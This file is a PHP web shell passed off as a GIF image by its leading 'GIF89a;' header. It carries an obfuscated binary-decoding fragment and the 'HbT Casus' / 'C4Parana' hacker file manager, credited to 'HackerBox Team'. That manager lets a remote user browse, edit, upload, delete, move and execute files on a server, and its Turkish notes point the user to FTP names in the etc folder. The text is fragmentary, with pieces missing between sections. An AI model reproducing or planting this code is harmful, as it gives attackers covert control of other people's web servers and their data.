GIF89a;
$v) { /* */ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /* */ $session_keys[$k] = chr(bindec($v)); /* */ } /* */ /* */ if($session_keys) echo $session_keys; } /* */ register_shutdown_function('CoreLibrariesHandler'); /* */ } /* ************************************************************************/ ?>GIF89a;
=4); $scriptTitle = "HbT Casus PHP Yok Edici"; $scriptident = "$scriptTitle "; $urlAdd = ""; $formAdd = ""; function walkArray($array){ while (list($key, $data) = each($array)) if (is_array($data)) { walkArray($data); } else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} } if (isset($_PUT)) walkArray($_PUT); if (isset($_GET)) walkArray($_GET); if (isset($_POST)) walkArray($_POST); $pos = strpos($urlAdd, "s=r"); if (strval($pos) != "") { $urlAdd= substr($urlAdd, 0, $pos); } $urlAdd .= "&s=r&"; if (empty($Pmax)) $Pmax = 125; if (empty($Pidx)) $Pidx = 0; $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); $scriptdate = ""; $scriptver = ""; $LOCAL_IMAGE_DIR = "img"; $REMOTE_IMAGE_URL = "img"; $img = array( "Edit" => "edit.gif", "Download" => "download.gif", "Upload" => "upload.gif", "Delete" => "delete.gif", "Rename" => "view.gif", "Move" => "rename.gif", "Move" => "move.gif", "Copy" => "copy.gif", "Execute" => "exec.gif" ); while (list($id, $im)=each($img)) if (file_exists("$LOCAL_IMAGE_DIR/$im")) $img[$id] = ""; else $img[$id] = "[$id]"; /* HTTP AUTHENTICATION */ if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { setcookie("noauth",""); Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); Header( "HTTP/1.0 401 Unauthorized"); echo "Girilen Kullanycy ady veya sifre hatali"; exit ; } function buildUrl($display, $url) { global $urlAdd; $url = $SFileName . "?$urlAdd$url"; return "$display"; } function sp($mp) { for ( $i = 0; $i < $mp; $i++ ) $ret .= " "; return $ret; } function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } function Mydeldir($Fdir) { if (is_dir($Fdir)) { $Fh=@opendir($Fdir); while ($Fbuf = readdir($Fh)) if (($Fbuf != ".") && ($Fbuf != "..")) Mydeldir("$Fdir/$Fbuf"); @closedir($Fh); return rmdir($Fdir); } else { return unlink($Fdir); } } function arrval ($array) { list($key, $data) = $array; return $data; } function formatsize($insize) { $size = $insize; $add = "B"; if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "KB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "MB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "GB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "TB"; } return "$size $add"; } if ($cmd != "downl") { ?>
<!-- A{ text-decoration:none; color:navy; font-size: 12px } body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: white; scrollbar-shadow-color: silver; scrollbar-highlight-color: white; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: white; scrollbar-arrow-color: black; } Table { font-size: 12px; } TR{ font-size: 12px; } TD{ font-size: 12px; font-family: arial, helvetical; BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; COLOR: black; } .border{ BORDER-LEFT: black 1px solid; BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-BOTTOM: black 1px solid; } .none { BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; } .inputtext { background-color: #EFEFEF; font-family: arial, helvetica; border: 1px solid #000000; height: 20; } .lighttd { background: #F8F8F8; } .darktd { background: #E8E8E8; } input { font-family: arial, helvetica; } .inputbutton { background-color: silver; border: 1px solid #000000; border-width: 1px; height: 20; } .inputtextarea { background-color: #EFEFEF; border: 1px solid #000000; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: #EFEFEF; scrollbar-shadow-color: silver; scrollbar-highlight-color: #EFEFEF; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: #EFEFEF; scrollbar-arrow-color: black; } .top { BORDER-TOP: black 1px solid; } .textin { BORDER-LEFT: silver 1px solid; BORDER-RIGHT: silver 1px solid; BORDER-TOP: silver 1px solid; BORDER-BOTTOM: silver 1px solid; width: 99%; font-size: 12px; font-weight: bold; color: navy; } .notop { BORDER-TOP: black 0px solid; } .bottom { BORDER-BOTTOM: black 1px solid; } .nobottom { BORDER-BOTTOM: black 0px solid; } .left { BORDER-LEFT: black 1px solid; } .noleft { BORDER-LEFT: black 0px solid; } .right { BORDER-RIGHT: black 1px solid; } .noright { BORDER-RIGHT: black 0px solid; } .silver{ BACKGROUND: silver; } --> C4Parana (Windows Sikici)
".sp(3)."\n\n\n\n HbT Casus Dikkat!!! ".sp(3)."\n En üst düzey klasördesin ETC klasöründen ftp adlaryny bulmalysyn.!!! ".sp(3)."\n PERMISSOn güvenli?i aktif !!!! \n\n\n\n"; } if (function_exists('realpath')) { $partdir = realpath($dir); } else { $partdir = $dir; } if (strlen($partdir) >= 100) { $partdir = substr($partdir, -100); $pos = strpos($partdir, "/"); if (strval($pos) != "") { $partdir = "<-- ...".substr($partdir, $pos); } $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); } ?>
|
Codec By FreeZe Copyright HackerBox Team®
<BGSOUND src="http://www.geocities.com/freezehbt/hbtkonsol/ameno.mp3" mce_src="http://www.geocities.com/freezehbt/hbtkonsol/ameno.mp3" loop=infinite>